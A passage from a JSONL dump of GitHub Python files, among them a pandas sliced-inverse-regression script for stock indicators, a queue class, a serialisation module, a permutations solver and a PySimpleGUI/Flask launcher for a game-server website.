self.likes = likes\n\n\ncomment = Comment('user1', 'This is comment', 12)\nprint(comment.username)\nprint(comment.content)\nprint(comment.likes)","repo_name":"crbonev/py-fund","sub_path":"05_objects_and_classes/Lab/01_comment.py","file_name":"01_comment.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3625802979","text":"import pandas as pd\nimport numpy as np\nfrom pandas.tseries.offsets import DateOffset\nimport scipy\nimport matplotlib.pyplot as plt\nDPath='/Users/harbes/PycharmProjects/data/CNRDS/' #'E:/data/CNRDS/' #\nindicators_all=pd.read_pickle(DPath+'indicators_all').replace([np.inf, -np.inf], np.nan)\nPV=pd.read_pickle(DPath+'PV');PV.tail(10)\ntmp=PV[['Scode','Trddt','Adclsprc']].iloc[1:].set_index(['Trddt','Scode'])\ntmp=tmp.astype(float)\nadjprc=tmp.loc[~tmp.index.duplicated(keep='last')].unstack() # 提出duplicates\nadjprc.index=pd.to_datetime(adjprc.index,format='%Y-%m-%d')# 调整index格式\nadjprc.columns=adjprc.columns.get_level_values(1)# 调整columns格式\nGroupBy1=lambda x:x.year*100.0+x.month\n#p0=adjprc.groupby(by=GroupBy).first();p0\nret=adjprc.groupby(by=GroupBy1).last().pct_change();\nret.index=pd.to_datetime(ret.index.astype(int).astype(str),format='%Y%m')\n\n# 标准化indicators\nindicators_all.index.names=['Trddt','Scode']\ndel_col=['CP', 'CTA', 'EY', 'ROIC', 'SC'] # 出现大量的nan,影响估计\nindicators_all=indicators_all[indicators_all.columns.difference(del_col)]\nindi_standardized=indicators_all.groupby(by=['Trddt']).apply(lambda x:(x-x.mean())/x.std())\nret[ret==0]=np.nan\nret1=ret.stack().reindex(indi_standardized.index)\nret1.index.names=['Trddt','Scode']\ntime_set=set(indi_standardized.index.get_level_values(0)) # 日期集合\nindi_set=indi_standardized.columns # 指标集合\n\nM_hat=pd.DataFrame(0.0,index=pd.MultiIndex.from_product([time_set,indi_set]),columns=indi_set).sort_index() # 用于储存每个时间的M_hat矩阵\nslice_labels_matrix=pd.DataFrame(np.nan,index=time_set,columns=ret.columns).sort_index() # 用于储存股票在不同时间的分组/切片\nslice_num=20\nqcut_q=np.arange(slice_num+1)/slice_num\nqcut_labels=range(1,slice_num+1) # labels总比q的长度小1\nX_j_bar=pd.DataFrame(np.nan,index=pd.MultiIndex.from_product([time_set,qcut_labels]),columns=indi_set).sort_index() # 用于记录每个切片的characteristics的均值\nfor t in slice_labels_matrix.index:\n #对target进行slice\n 
for t in slice_labels_matrix.index:\n    # slice the target returns into equal-probability bins\n    slice_labels_matrix.loc[t]=pd.qcut(ret.loc[t],q=qcut_q,labels=qcut_labels)\n    N = slice_labels_matrix.loc[t].count()\n    for i in qcut_labels:\n        X_j_bar.loc[(t,i)]=indi_standardized.loc[(t,slice(None))].loc[slice_labels_matrix.loc[t]==i].mean()#.fillna(0.0) # quite a few NaNs show up here; drop these indicators?\n        M_hat.loc[(t, slice(None)), :] +=np.kron(X_j_bar.loc[(t,i)],X_j_bar.loc[(t,i)]).reshape(indi_set.size,indi_set.size)\\\n            *indi_standardized.loc[(t,slice(None))].loc[slice_labels_matrix.loc[t]==i].shape[0]/N\n\nfor t in slice_labels_matrix.index:\n    indi_standardized.loc[t].fillna(0.0).T@indi_standardized.loc[t].fillna(0)\n    a,b=np.linalg.eigh(indi_standardized.loc[t].cov())\n    tmp=np.zeros((indi_set.size,indi_set.size))\n\n\n    for i in indi_standardized.loc[t].index:\n        tmp+=np.kron(indi_standardized.loc[(t,i)].fillna(0.0),indi_standardized.loc[(t,i)].fillna(0.0)).reshape(indi_set.size,indi_set.size)\n    tmp/=indi_standardized.loc[t].index.size;tmp\n    eig_vals, _ = np.linalg.eigh(tmp);eig_vals#.cumsum() / eig_vals.sum()\n    np.linalg.det(tmp)\nM_hat.loc[t]\nX_j_bar.loc[t].cov()\n\neig_vals,_=np.linalg.eigh(X_j_bar.loc[t].cov());eig_vals.cumsum()/eig_vals.sum()\neig_vals,_=np.linalg.eigh(M_hat.loc[t]);eig_vals.cumsum()/eig_vals.sum()\n\neig_vals,_=np.linalg.eigh(indi_standardized.loc[(t,slice(None))].iloc[:,list(range(17))+list(range(18,20))].cov());eig_vals.cumprod() # exclude 17,49,60,61\nindi_standardized.loc[(t,slice(None))].iloc[:,:-2].cov()","repo_name":"Harbes/python","sub_path":"paper-PhD/Lab-SIR.py","file_name":"Lab-SIR.py","file_ext":"py","file_size_in_byte":3565,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"36983535338","text":"class Node:\n\tdef __init__(self, value):\n\t\tself.value = value\n\t\tself.next = None\n\nclass Queue:\n\tdef __init__(self):\n\t\tself.first = None\n\t\tself.last = None\n\t\tself.length = 0\n\n\tdef isEmpty(self):\n\t\treturn self.length == 0\n\n\tdef peek(self):\n\t\treturn self.first\n\n\tdef push(self,value):\n\t\tnewNode = Node(value)\n\t\tif (self.length == 0):\n\t\t\tself.first = newNode\n\t\t\tself.last = self.first\n\t\telse:\n\t\t\tself.last.next = newNode\n\t\t\tself.last = newNode\n\t\tself.length += 1\n\t\treturn self\n\n\tdef pop(self):\n\t\tif (self.length == 0):\n\t\t\treturn \"Nothing to return\"\n\n\t\tpopped = self.first\n\t\tif (self.length == 1):\n\t\t\tself.first = None\n\t\t\tself.last = None\n\t\telse:\n\t\t\tself.first = self.first.next\n\n\t\tself.length -= 1\n\t\treturn popped\n\nmyQ = Queue()","repo_name":"april9288/ds_algorithms","sub_path":"Data Structures/queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11279974700","text":"from abc import ABC, abstractclassmethod, abstractproperty\n\n\nbasic_types = (str, int, bool, float, complex, type(None))\nforbidden_names = {\"modifier_name\"}\n\n\nclass Modifier(ABC):\n\n    name = abstractproperty()\n    modifies = abstractproperty()\n\n    @abstractclassmethod\n    def compose(cls, stream, context):\n        pass\n\n    @abstractclassmethod\n    def decompose(cls, value, stream, context):\n        pass\n\n\nclass ModifierManager:\n\n    def __init__(self, context=None, modifiers=None):\n        if modifiers is None:\n            modifiers = []\n        if context is None:\n            context = {}\n\n        self._modifiers = []\n        self._type_to_modifier = {}\n        self._name_to_modifier = {}\n\n        self.context = context\n\n        for m in modifiers:\n            self.add_modifier(m)\n\n    def add_modifier(self, 
modifier_cls):\n self._modifiers.append(modifier_cls)\n self._type_to_modifier[modifier_cls.modifies] = modifier_cls\n self._name_to_modifier[modifier_cls.name] = modifier_cls\n\n def from_name(self, name):\n return self._name_to_modifier[name]\n\n def from_class(self, cls):\n return self._type_to_modifier[cls]\n\n\nclass StreamBase(ABC):\n\n def __init__(self, data=None, modifier_manager=None):\n if data is None:\n data = {}\n\n self._data = data\n self._modifier_manager = modifier_manager\n\n def substream(self, name):\n try:\n data = self._data[name]\n\n except KeyError:\n self._data[name] = data = {}\n\n return self.__class__(data, modifier_manager=self._modifier_manager)\n\n\nclass ReadStream(StreamBase):\n\n def read(self, name):\n value = self._data[name]\n\n if isinstance(value, dict):\n if 'modifier_name' in value:\n substream = self.__class__(data=value, modifier_manager=self._modifier_manager)\n\n modifier_name = value['modifier_name']\n modifier = self._modifier_manager.from_name(modifier_name)\n value = modifier.compose(substream, self._modifier_manager.context)\n\n else:\n raise ValueError(\"Cannot read substream\")\n\n return value\n\n\nclass WriteStream(StreamBase):\n\n def write(self, name, value):\n if name in forbidden_names:\n raise ValueError(\"Forbidden name {!r}\".format(name))\n\n if not isinstance(value, basic_types):\n type_cls = value.__class__\n\n try:\n modifier = self._modifier_manager.from_class(type_cls)\n\n except KeyError:\n raise TypeError(\"Value must be str, int, bool, complex, float, NoneType or modifiable, not {!r}\"\n .format(type_cls))\n\n substream = self.__class__(modifier_manager=self._modifier_manager)\n modifier.decompose(value, substream, self._modifier_manager.context)\n\n value = substream._data\n value['modifier_name'] = modifier.name\n\n self._data[name] = value\n","repo_name":"agoose77/basic_serialisation","sub_path":"serialiser/stream.py","file_name":"stream.py","file_ext":"py","file_size_in_byte":3005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40905291803","text":"class Solution:\n def permute(self, nums: list[int]) -> list[list[int]]:\n allPermutations = []\n for x in nums:\n holdinglist = []\n holdinglist.extend(self.permuteHelper([x],nums))\n if len(holdinglist) == 0:\n holdinglist = [[x]]\n else:\n for y in holdinglist:\n y.append(x)\n allPermutations.extend(holdinglist)\n return allPermutations\n \n def permuteHelper(self, elements: list[int], nums: list[int] ) -> list[list[int]]:\n if len(elements) == len(nums):\n return []\n allPermutations = []\n for x in nums:\n holdinglist = []\n if x in elements:\n continue\n else:\n elements.append(x)\n holdinglist.extend(self.permuteHelper(elements,nums))\n elements.pop()\n if len(holdinglist) == 0:\n holdinglist = [[x]]\n else:\n for y in holdinglist:\n y.append(x)\n allPermutations.extend(holdinglist)\n return allPermutations","repo_name":"LukeKnezCK/leetcodeNonsense","sub_path":"pythonStuff/leetcode46.py","file_name":"leetcode46.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17050694606","text":"from commands.command_handler import get_name\nfrom datas.batch_data import str_batch\n\n\nclass SaveBatch:\n def __init__(self, args):\n self.args = args\n\n def execute(self):\n try:\n arg_list = self.args.split()\n file_name = None\n if len(arg_list) == 2:\n file_name = arg_list[1] + '.dnabatch'\n elif len(arg_list) == 
1:\n                file_name = get_name(arg_list[0])+ '.dnabatch'\n            else:\n                raise ValueError\n            print(file_name)\n            f = open(file_name, \"w\")\n            for command in str_batch.get(get_name(arg_list[0])):\n                f.write(command+'\\n')\n            f.close()\n        except ValueError:\n            print(\"Args not valid\")\n            return\n        except:\n            print(\"Error\")\n","repo_name":"miryamduker/DNA-project","sub_path":"commands/batch_commands/saving_batch.py","file_name":"saving_batch.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2184936848","text":"\n## !/usr/bin/python\n## -*- coding:utf-8 -*-\nimport json\nimport analysis.AutoClaveStateDetect\n\nload_dict = {}\nload_dict2 = {}\nwith open(\"4XFIN1602902895Y1602943935.json\",'r') as load_f:\n    load_dict = json.load(load_f)\n\nwith open(\"rec_templete.json\",'rb') as load_f:\n    load_dict2 = json.load(load_f)\n\nload_dict3 = analysis.AutoClaveStateDetect.state_detect(load_dict, load_dict2)\nstring = json.dumps(load_dict3,ensure_ascii=False)\n\nwith open(\"4R1602902895.json\",\"w\",encoding='utf-8') as f:\n    f.write(string)\n    print(\"Finished writing the file...\")\n\n\n\"\"\"\nt_min = state[0]['t']\nt_max = 0\n\nfor rec in state:\n    t = rec['t']\n    t_max = t\n\nlen = len(state)\nadd = int(4095/12)\nt_add = int((t_max-t_min)/13)\n\nfor rec in state:\n    t = rec['t']\n    a = int((t-t_min)/t_add)\n    if a > 12:\n        a = 12\n    state_val = a*add\n    rec['v'] = state_val\n\nprint(state)\nwith open(\"4XFIN1602902895Y1602943935.json\",\"w\") as f:\n    json.dump(load_dict,f)\n    print(\"Finished writing the file...\")\n\"\"\"\n\"\"\"\nload_dict2 = {}\nwith open(\"4R1602902895.json\",'r') as load_f:\n    load_dict2 = json.load(load_f)\n\nload_dict2[\"devInput\"] = \"normal\"\nload_dict2[\"sensorInput\"] = \"normal\"\nload_dict2[\"startTime\"] = 1602902895\nload_dict2[\"endTime\"] = 1602943935\nload_dict2[\"recordTime\"] = 1602943935-1602902895\nload_dict2[\"sampleNum\"] = len(state)\npre_state = -1\ninfo = load_dict2[\"stateInfo\"]\ncnt = 0\nfor rec in state:\n    state_id = int(rec['v']/4090*12)\n    if(pre_state != state_id):\n        pre_state = state_id\n        t = rec[\"t\"]\n        sinf = info[\"state\"+str(state_id)]\n        if state_id == 12:\n            sinf[\"endTime\"] = load_dict2[\"endTime\"]\n        sinf[\"startTime\"] = t\n        sinf[\"startIndex\"] = cnt\n        if state_id > 0:\n            sinf = info[\"state\" + str(state_id-1)]\n            sinf[\"endTime\"] = t\n            sinf[\"endIndex\"] = cnt-1\n        print(t)\n    cnt = cnt + 1\n    if(cnt > len(state)):\n        break\n\nstring = json.dumps(load_dict2)\nwith open(\"4R1602902895.json\",\"w\") as f:\n    f.write(string)\n    print(\"Finished writing the file...\")\n\"\"\"","repo_name":"Travis-MA/Iot-CMP","sub_path":"doc/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"4052154436","text":"from __future__ import annotations\n\nimport dataclasses\nfrom datetime import datetime, timezone\nfrom typing import TYPE_CHECKING, Sequence\n\nfrom guardpost.jwts import JWTValidator, InvalidAccessToken\nfrom jose import JWTError\nfrom jwt import DecodeError\nfrom litestar.contrib.jwt.jwt_token import Token\nfrom litestar.exceptions import NotAuthorizedException, ImproperlyConfiguredException\nfrom litestar.middleware import AbstractAuthenticationMiddleware, AuthenticationResult\n\n__all__ = (\"JWKAuthenticationMiddleware\",)\n\nif TYPE_CHECKING:\n    from typing import Any\n\n    from litestar.connection import ASGIConnection\n    from litestar.types import ASGIApp, Method, Scopes\n    from litestar.utils import 
AsyncCallable\n\n\nclass JWKAuthenticationMiddleware(AbstractAuthenticationMiddleware):\n \"\"\"JWK Authentication middleware.\n\n This class provides JWK authentication functionalities.\n \"\"\"\n\n __slots__ = (\n \"auth_header\",\n \"retrieve_user_handler\",\n \"jwt_validator\",\n )\n\n def __init__(\n self,\n app: ASGIApp,\n auth_header: str,\n exclude: str | list[str] | None,\n exclude_http_methods: Sequence[Method] | None,\n exclude_opt_key: str,\n retrieve_user_handler: AsyncCallable[[Token, ASGIConnection[Any, Any, Any, Any]], Any],\n scopes: Scopes,\n jwt_validator: JWTValidator,\n ) -> None:\n \"\"\"Check incoming requests for an encoded token in the auth header specified, and if present retrieve the user\n from persistence using the provided function.\n\n Args:\n algorithm: JWT hashing algorithm to use.\n app: An ASGIApp, this value is the next ASGI handler to call in the middleware stack.\n auth_header: Request header key from which to retrieve the token. E.g. ``Authorization`` or ``X-Api-Key``.\n exclude: A pattern or list of patterns to skip.\n exclude_opt_key: An identifier to use on routes to disable authentication for a particular route.\n exclude_http_methods: A sequence of http methods that do not require authentication.\n retrieve_user_handler: A function that receives a :class:`Token <.contrib.jwt.Token>` and returns a user,\n which can be any arbitrary value.\n scopes: ASGI scopes processed by the authentication middleware.\n jwt_validator: Secret for decoding the JWT token. This value should be equivalent to the secret used to\n encode it.\n \"\"\"\n super().__init__(\n app=app,\n exclude=exclude,\n exclude_from_auth_key=exclude_opt_key,\n exclude_http_methods=exclude_http_methods,\n scopes=scopes,\n )\n self.auth_header = auth_header\n self.retrieve_user_handler = retrieve_user_handler\n self.jwt_validator = jwt_validator\n\n async def authenticate_request(self, connection: ASGIConnection[Any, Any, Any, Any]) -> AuthenticationResult:\n \"\"\"Given an HTTP Connection, parse the JWT api key stored in the header and retrieve the user correlating to the\n token from the DB.\n\n Args:\n connection: An Litestar HTTPConnection instance.\n\n Returns:\n AuthenticationResult\n\n Raises:\n NotAuthorizedException: If token is invalid or user is not found.\n \"\"\"\n auth_header = connection.headers.get(self.auth_header)\n if not auth_header:\n raise NotAuthorizedException(\"No JWT token found in request header\")\n encoded_token = auth_header.partition(\" \")[-1]\n return await self.authenticate_token(encoded_token=encoded_token, connection=connection)\n\n async def decode(self, encoded_token: str) -> Token:\n \"\"\"Decode a passed in token string and returns a Token instance.\n\n Args:\n encoded_token: A base64 string containing an encoded JWT.\n\n Returns:\n A decoded Token instance.\n\n Raises:\n NotAuthorizedException: If the token is invalid.\n \"\"\"\n try:\n payload = await self.jwt_validator.validate_jwt(access_token=encoded_token)\n #payload = jwt.decode(token=encoded_token, key=secret, algorithms=[algorithm], options={\"verify_aud\": False})\n exp = datetime.fromtimestamp(payload.pop(\"exp\"), tz=timezone.utc)\n iat = datetime.fromtimestamp(payload.pop(\"iat\"), tz=timezone.utc)\n field_names = {f.name for f in dataclasses.fields(Token)}\n extra_fields = payload.keys() - field_names\n extras = payload.pop(\"extras\", {})\n for key in extra_fields:\n extras[key] = payload.pop(key)\n return Token(exp=exp, iat=iat, **payload, extras=extras)\n except (KeyError, JWTError, 
ImproperlyConfiguredException, DecodeError, InvalidAccessToken) as e:\n raise NotAuthorizedException(\"Invalid token\") from e\n\n async def authenticate_token(\n self, encoded_token: str, connection: ASGIConnection[Any, Any, Any, Any]\n ) -> AuthenticationResult:\n \"\"\"Given an encoded JWT token, parse, validate and look up sub within token.\n\n Args:\n encoded_token: Encoded JWT token.\n connection: An ASGI connection instance.\n\n Raises:\n NotAuthorizedException: If token is invalid or user is not found.\n\n Returns:\n AuthenticationResult\n \"\"\"\n token = await self.decode(\n encoded_token=encoded_token\n )\n\n\n\n user = await self.retrieve_user_handler(token, connection)\n\n if not user:\n raise NotAuthorizedException()\n\n return AuthenticationResult(user=user, auth=token)\n\n","repo_name":"heralight/litestar-jwk-demo","sub_path":"src/backend/auth_middleware.py","file_name":"auth_middleware.py","file_ext":"py","file_size_in_byte":5747,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"30656345984","text":"# Ch.04 Exercise 4.1, 4.4, & 4.5 Official Answer\n# Guess a number from 0 to 100.\n# Will show \"Too Big\" or \"too small\".\n# will show the total guess time when get right number.\n# Not-interger will ask to re-enter\n\n# from random import randint\nimport random, types\n\nrandom.seed(100)\nnum = random.randint(0, 100)\ntim = 0\n\nwhile 1:\n try:\n putnum = eval(input(\"Please enter the number you guess: \"))\n\n if type(putnum) == type(1):\n tim += 1\n\n if putnum > num:\n print(\"Too Big!\")\n elif putnum < num:\n print(\"too small!\")\n elif putnum == num:\n print(\"Guess {} times, You got it!\".format(tim))\n break\n\n else:\n print(\"Must be an integer!\")\n\n except:\n print(\"Wrong Input!\")\n","repo_name":"TomFoxLee/Python543","sub_path":"PYECourse/Ch.04/a4.1_4.4_4.5o_NumberGuess.py","file_name":"a4.1_4.4_4.5o_NumberGuess.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30031025896","text":"import PySimpleGUI as sg\nimport os, re, subprocess\nfrom flask import Flask, render_template, flash, redirect, url_for, request, session\nfrom classes.forms import RegistrationForm\nfrom classes.functions import Main\nimport datetime, textwrap\nfrom configparser import ConfigParser\nfrom multiprocessing import Process\nimport webbrowser\n\nimport threading\n\nconfigPath = \"config.ini\"\nconfig = ConfigParser()\nconfig.read(configPath)\n\n\ndef validipv4(ip):\n pattern = re.compile(r\"\"\"\n ^\n (?:\n # Dotted variants:\n (?:\n # Decimal 1-255 (no leading 0's)\n [3-9]\\d?|2(?:5[0-5]|[0-4]?\\d)?|1\\d{0,2}\n |\n 0x0*[0-9a-f]{1,2} # Hexadecimal 0x0 - 0xFF (possible leading 0's)\n |\n 0+[1-3]?[0-7]{0,2} # Octal 0 - 0377 (possible leading 0's)\n )\n (?: # Repeat 0-3 times, separated by a dot\n \\.\n (?:\n [3-9]\\d?|2(?:5[0-5]|[0-4]?\\d)?|1\\d{0,2}\n |\n 0x0*[0-9a-f]{1,2}\n |\n 0+[1-3]?[0-7]{0,2}\n )\n ){0,3}\n |\n 0x0*[0-9a-f]{1,8} # Hexadecimal notation, 0x0 - 0xffffffff\n |\n 0+[0-3]?[0-7]{0,10} # Octal notation, 0 - 037777777777\n |\n # Decimal notation, 1-4294967295:\n 429496729[0-5]|42949672[0-8]\\d|4294967[01]\\d\\d|429496[0-6]\\d{3}|\n 42949[0-5]\\d{4}|4294[0-8]\\d{5}|429[0-3]\\d{6}|42[0-8]\\d{7}|\n 4[01]\\d{8}|[1-3]\\d{0,9}|[4-9]\\d{0,8}\n )\n $\n \"\"\", re.VERBOSE | re.IGNORECASE)\n return pattern.match(ip) is not None\n\n\nsqlRefference = \"Windows Drivers Reference\\n\" \\\n \"{SQL Server} - released with SQL 
Server 2000\\n\" \\\n \"{SQL Native Client} - released with SQL Server 2005 (also known as version 9.0)\\n\" \\\n \"{SQL Server Native Client 10.0} - released with SQL Server 2008\\n\" \\\n \"{SQL Server Native Client 11.0} - released with SQL Server 2012\\n\" \\\n \"{ODBC Driver 11 for SQL Server} - supports SQL Server 2005 through 2014\\n\" \\\n \"{ODBC Driver 13 for SQL Server} - supports SQL Server 2005 through 2016\\n\" \\\n \"{ODBC Driver 13.1 for SQL Server} - supports SQL Server 2008 through 2016\\n\" \\\n \"{ODBC Driver 17 for SQL Server} - supports SQL Server 2008 through 2017\"\n\nsqlConnect = [\n [sg.Text(\"SQL Driver\", size=(10,1)), sg.DropDown(\n enable_events=True,\n readonly=True,\n font=10,\n default_value=config.get(\"sqlConfig\", \"sql_driver\"),\n size=(24,1),\n tooltip=sqlRefference, pad=(0,5),\n values=[\"{SQL Server}\",\n \"{SQL Native Client}\",\n \"{SQL Server Native Client 10.0}\",\n \"{SQL Server Native Client 11.0}\",\n \"{ODBC Driver 11 for SQL Server}\",\n \"{ODBC Driver 13 for SQL Server}\",\n \"{ODBC Driver 13.1 for SQL Server}\",\n \"{ODBC Driver 17 for SQL Server}\"])],\n [sg.Text(\"Instance\",size=(10,1),pad=(0,5) ), sg.InputText(default_text=(config.get(\"sqlConfig\", \"SQL_SERVER\"))), ],\n [sg.Text(\"Port\", size=(10,1) ,pad=(0,5) ),sg.InputText(default_text=(config.get(\"sqlConfig\", \"SQL_PORT\")))],\n [sg.Text(\"Username\", size=(10,1),pad=(0,5)),sg.InputText( default_text=(config.get(\"sqlConfig\", \"SQL_USER\")))],\n [sg.Text(\"Password\", size=(10,1),pad=(0,5)), sg.InputText(password_char=\"*\",default_text=(config.get(\"sqlConfig\", \"SQL_PASS\")))],\n [sg.Text(\"Database\", size=(10,1),pad=(0,5)), sg.InputText(default_text=(config.get(\"sqlConfig\", \"SQL_DBASE\")))]]\n\n\ndef isPortFree(host,port):\n import socket, errno\n\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n s.bind((host, port))\n except socket.error as e:\n return False\n finally:\n return True\n s.close()\n\n\ndef ExecuteCommandSubprocess(command, wait=False, quiet=True, *args):\n try:\n sp = subprocess.Popen([command,*args], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n if wait:\n out, err = sp.communicate()\n if not quiet:\n if out:\n print(out.decode(\"utf-8\"))\n if err:\n print(err.decode(\"utf-8\"))\n except Exception as e:\n print('Exception encountered running command ', e)\n return ''\n\n return (out.decode('utf-8'))\n\ndef listThemes():\n themes_list = []\n for themes in os.listdir('templates/themes/'):\n themes_list.append(themes)\n return themes_list\n\ndef seasons(vars):\n if vars == \"Season 0-1\":\n return 20\n elif vars == \"Season 2-8\":\n return 32\n elif vars == \"Season 9-13\":\n return 64\n else:\n return 20\ndef season_reverse(value):\n if value == 20:\n return \"Season 0-1\"\n elif value == 32:\n return \"Season 2-8\"\n elif value == 64:\n return \"Season 9-13\"\n else:\n return \"Season 0-1\"\n\nwebSettings = [\n\n [sg.Text(\"Server Name\", size=(10, 1), pad=(0, 5)), sg.InputText(default_text=(config.get(\"webConfig\", \"server_name\"))), ],\n [sg.Text(\"Secret Key\", size=(10, 1), pad=(0, 5)), sg.InputText(default_text=(config.get(\"webConfig\", \"secret_key\")))],\n [sg.Text(\"Season\", size=(10, 1), pad=(0, 5)), sg.DropDown(default_value=season_reverse(config.getint(\"webConfig\", \"item_hex_len\")),\n values=[\"Season 0-1\", \"Season 2-8\", \"Season 9-13\"], readonly=True)],\n [sg.Text(\"Web Debug\", size=(10, 1), pad=(0, 5)), sg.Checkbox(text=\"\", default=config.getboolean(\"webConfig\", \"web_debug\"))],\n 
[sg.Text(\"Web IP\", size=(10, 1), pad=(0, 5)), sg.InputText(default_text=(config.get(\"webConfig\", \"web_ip\")))],\n [sg.Text(\"Web PORT\", size=(10, 1), pad=(0, 5)), sg.InputText(default_text=(config.getint(\"webConfig\", \"web_port\")))],\n [sg.Text(\"Web Theme\", size=(10, 1), pad=(0, 5)), sg.DropDown(default_value=config.get(\"webConfig\", \"web_theme\"),values=listThemes(), readonly=True)],\n [sg.Text(\"Theme Switcher\", size=(10, 1), pad=(0, 5)), sg.Checkbox(text=\"\", default=config.getboolean(\"webConfig\", \"theme_switcher\"))]\n]\n\n\n\nlayout = [[sg.TabGroup([[sg.Tab('SQL Settings', sqlConnect), sg.Tab('WEB Settings', webSettings)]])],\n [sg.Button('Start Server', disabled=False,auto_size_button=False),\n sg.Button('Stop Server', disabled=True, auto_size_button=False)]\n ]\n\nwindow = sg.Window('DTpyWeb GUI v2', icon=\"static/default-images/favicon.ico\",\n auto_size_text=False,\n default_element_size=(30, 1),\n return_keyboard_events=True,\n use_default_focus=False,\n text_justification=\"left\"\n ).Layout(layout).Finalize()\n\n\n\ndef runWeb():\n configPath = \"config.ini\"\n config = ConfigParser()\n config.read(configPath)\n\n main = Main()\n app = Flask(__name__)\n app.config['SECRET_KEY'] = config.get(\"webConfig\", \"secret_key\")\n @app.context_processor\n def _processor():\n return dict(\n date_now=datetime.datetime.now().strftime(\"%d.m.%Y %H:%M:%S\"),\n author=\"© 2020 r00tme - DTpyWeb. All rights reserved.\",\n theme=main.themes_check()[0],\n theme_switch_form = main.themes_check()[1],\n theme_switch_active = config.getboolean(\"webConfig\", \"theme_switcher\"),\n top10=main.rankings(\" TOP 10 \"),\n header=\"header.html\",\n server=config.get(\"webConfig\", \"server_name\"),\n )\n\n @app.route('/userinfo', methods=['GET'])\n @app.route('/userinfo', methods=['GET', 'POST'])\n def users_info(path):\n main.theme_switcher()\n if main.user_exist(path[1:], False):\n\n item_image = []\n item_info = []\n\n for i in range(0, 12):\n user_items = textwrap.wrap(main.return_items(path[1:]), config.getint(\"webConfig\", \"item_hex_len\"))[i]\n if main.item_info(user_items):\n item_image.append(main.item_info(user_items)[1])\n item_info.append(main.item_info(user_items)[0])\n else:\n item_image.append(\"\")\n item_info.append(\"\")\n return render_template(\"modules/userinfo.html\", title=\"Character Information Page\",\n item_info=item_info, item_image=item_image, character=path[1:])\n\n else:\n flash(r'This user does not exist', 'error')\n return redirect(url_for('home'))\n\n @app.route('/', methods=['GET', 'POST'])\n @app.route('/home', methods=['GET', 'POST'])\n def home():\n # TODO news System\n # * This route will be removed after the news system is completed\n main.login()\n main.theme_switcher()\n stripin = main.themes_check()[0].split('/')\n return render_template(\"%s/%s/home.html\" % (stripin[0], stripin[1]), title=\"News\")\n\n @app.route('/download', methods=['GET', 'POST'])\n @app.route('/about', methods=['GET', 'POST'])\n @app.route('/rules', methods=['GET', 'POST'])\n @app.route('/rankings', methods=['GET', 'POST'])\n def main_pages():\n main.login()\n main.theme_switcher()\n var = config.get(\"dl_links\", \"dl_links\")\n cors = str(var).split(\"\\n\")\n return render_template(\"modules/\" + request.path + \".html\", title=u\"%s\" % request.path[1:].capitalize(),\n download_links=cors)\n\n @app.route('/buy-credits', methods=['GET', 'POST'])\n @app.route('/my-auction', methods=['GET', 'POST'])\n @app.route('/buy-credits', methods=['GET', 'POST'])\n 
@app.route('/my-account', methods=['GET', 'POST'])\n    @app.route('/my-characters', methods=['GET', 'POST'])\n    @app.route('/vip-modules', methods=['GET', 'POST'])\n    @app.route('/my-market', methods=['GET', 'POST'])\n    def user_pages():\n        main.theme_switcher()\n        if 'username' not in session:\n            flash(r'You do not have access to this page', 'error')\n            return redirect(url_for('home'))\n        else:\n            return render_template(\"modules/user/\" + request.path + \".html\",\n                                   title=u\"%s %s Page\" % (request.path.split(\"-\")[0][1:].title(),\n                                                          request.path.split(\"-\")[1].title()))\n\n    @app.route('/logout')\n    def logout():\n        session.pop('username', None)\n        flash('You were logged out', 'info')\n        return redirect('/home')\n\n    @app.route('/register', methods=['GET', 'POST'])\n    def register():\n        main.theme_switcher()\n        form = RegistrationForm()\n        if form.validate_on_submit():\n            main.register(\n                form.username.data,\n                form.password.data,\n                form.email.data,\n                form.question.data,\n                form.answer.data)\n        return render_template(\"modules/register.html\", title=\"Register\", form=form)\n\n    @app.errorhandler(404)\n    def page_not_found(e):\n        return render_template(\"modules/404.html\", title=\"Page does not exist\"), 404\n\n    from flask import request\n    def shutdown_server():\n        func = request.environ.get('werkzeug.server.shutdown')\n        if func is None:\n            raise RuntimeError('Not running with the Werkzeug Server')\n        func()\n\n    @app.route('/shutdown', methods=['POST'])\n    def shutdown():\n        shutdown_server()\n        return 'Server shutting down...'\n\n\n    app.run(debug=False, host=config.get(\"webConfig\", \"web_ip\"),\n            port=config.getint(\"webConfig\", \"web_port\"))\n\ndef thegui():\n    while True:\n        event, values = window.Read(timeout=0)\n        if event is None or event == \"Exit\": # always, always give a way out!\n            break\n        if event != sg.TIMEOUT_KEY:\n            config.set(\"sqlConfig\", str(\"sql_driver\"), str(values[0]))\n            config.set(\"sqlConfig\", str(\"sql_server\"), str(values[1]))\n            if values[2].isdigit():\n                config.set(\"sqlConfig\", \"sql_port\", values[2])\n            else:\n                sg.Popup(\"Type a valid port number that is not already in use\")\n                window.FindElement(2).Update(values[2][:-1])\n            config.set(\"sqlConfig\", str(\"sql_user\"), str(values[3]))\n            config.set(\"sqlConfig\", str(\"sql_pass\"), str(values[4]))\n            config.set(\"sqlConfig\", str(\"sql_dbase\"), str(values[5]))\n\n\n            config.set(\"webConfig\", str(\"server_name\"), str(values[6]))\n            config.set(\"webConfig\", str(\"secret_key\"), 